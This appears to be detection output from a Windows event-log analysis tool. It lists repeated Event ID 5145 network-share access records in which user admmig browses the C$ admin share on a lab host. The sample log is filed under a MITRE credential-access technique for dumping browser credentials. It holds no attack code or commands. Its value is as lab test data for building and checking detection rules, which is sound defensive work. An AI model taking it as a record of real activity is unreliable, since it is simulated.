+2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.484 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.505 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.523 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.558 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.641 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
